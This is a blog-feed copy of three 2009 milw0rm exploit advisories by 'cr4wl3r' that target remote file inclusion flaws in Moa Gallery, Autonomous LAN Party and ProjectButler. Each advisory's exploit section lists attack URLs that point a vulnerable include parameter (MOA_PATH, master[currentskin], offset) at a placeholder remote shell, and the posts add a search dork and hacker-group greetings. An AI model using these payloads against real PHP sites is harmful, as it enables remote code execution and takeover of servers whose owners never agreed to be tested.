/>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||<br />######################################################################<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />**********************************************************************<br />######################################################################<br />#[x] Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability <br />#[!] Download : http://sourceforge.net/projects/moagallery/files/ <br />#[!] Author : cr4wl3r <br />#[!] Contact : cr4wl3r[4t]linuxmail[dot]org <br />#[!] Location : Gorontalo - INDONESIA <br />#[!] Dork : "Tanyakan Pada Rumput Yang Bergoyang" <br />######################################################################<br /><br />[x] 3xplo!t : <br /> <br />http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]<br />http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea] <br />http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea] <br /><br />######################################################################<br />#[!] Greetz : MyMom [alm] <br /># <br />#[!] Special Thanks : str0ke, google, All MusLiM HacKers <br />#<br />#[!] Thanks 2 : Irvian, xoron<br />#<br />#[!] SeLamaT MenuNaiKan IbaDah PuaSa RaMadHan 1430H <br />######################################################################<br />**********************************************************************<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />######################################################################<br />||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||<br />&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;<br />%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%<br />$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br /><br /># milw0rm.com [2009-08-26]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4582017573897605968?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-56667171033300250082009-09-16T10:32:00.000-07:002009-09-16T10:33:13.936-07:00<pre>============================================================================================================<br />[x] Autonomous LAN party <= 0.98.3 Remote File Include Vulnerability ||<br />[!] Download Script : ||<br />http://sourceforge.net/projects/alp/files/alp/alp_0-98-3_15oct2006/alp_0-98-3_15oct2006.zip/download ||<br />[!] Author : cr4wl3r ||<br />[!] Contact : cr4wl3r[4t]linuxmail[dot]org ||<br />[!] SiTe : |www.sekuritionline.net| |www.manadocoding.net| ||<br />[!] Location : Gorontalo - INDONESIA ||<br />[!] Dork : "Tanyakan Pada Rumput Yang Bergoyang" ||<br />============================================================================================================<br />============================================================================================================<br />[x] 3xplo!t : ||<br /> ||<br />http://localhost/[path]/include/_bot.php?master[currentskin]=[AvriLhea] ||<br /> ||<br />============================================================================================================<br />============================================================================================================<br />[!] Greetz : MyMom [alm] ||<br /> ||<br />[!] Special Thanks : str0ke, All MusLiM HacKers ||<br /> ||<br />[!] Shoutz : Mr_Athan, CyberPeaCe, AgenR@t, AngKy.Tat0ki, basix, EA.ngel, zvtral, ||<br /> bl4ck.3n91n3, d3vilnet, venom.injector,Funky.Sensey, untouch, ||<br /> exnome, Himoe, kec0a, Mr.C, Mr.crosbeam, Ri55ky, v3lix, Hmei7, ||<br /> CyberLog, g4pt3k, mywisdom, wendys, y0ps.512mb, Is.bl4nk, iY0ng, ||<br /> Anjas.chu'x, Jams.chu'X, Minj0.b0rj0e, exnome, dbanie, Ijan, ||<br /> SunKetzu AbbaSSia, ty0 || <br /> ||<br />============================================================================================================ ||<br />[!] Thanks To MneR HacKer UniVerSiTas IcHsaN GoRonTaLo : ||<br /> ||<br /> Adi Saputera Abd Karim S.Kom, Sudirman Melangi S.Kom, Abd Manan ST, All StAF FaK FiKoM UniSaN ||<br /> Dan SeLuRuh WisuDawan Universitas Ichsan Gorontalo Angkatan 2009 ||<br /> FroM : cr4wl3r a.k.a Ramdan Yantu S.Kom :lol: ||<br /> ||<br />============================================================================================================<br />[!] To My HoNeY Lia Aprilia Hasan ---> BiarPun KaMu Lagi MaraH Tetap SaJa Kelihatan CanTik ;) ||<br /> ||<br />============================================================================================================<br /><br /># milw0rm.com [2009-08-18]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5666717103330025008?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-2990534527979274602009-09-16T10:31:00.000-07:002009-09-16T10:32:32.352-07:00<pre>#projectbutler - 1.5.0 (offset) RFI Vulnerability<br /><br />#Author: cr4wl3r<br /><br />#Contact: cr4wl3r[4t]linuxmail[dot]org<br /><br />#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz<br /><br />#Vuln : require_once($offset."class.project.inc");<br /><br />#PoC :<br /><br />http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]<br /><br />#Greetz : MyMom [alm]<br /><br />#Special To : |CyberSufi| |CyberPeaCe| |AgenR@t| |Ea.ngel| |bl4ck.3n91n3| |Hmei7| |Dew0| |Anjas.chu'X| |Ridwan| <br /><br /> |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD|<br /> |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN|<br /><br /># milw0rm.com [2009-08-03]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-299053452797927460?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0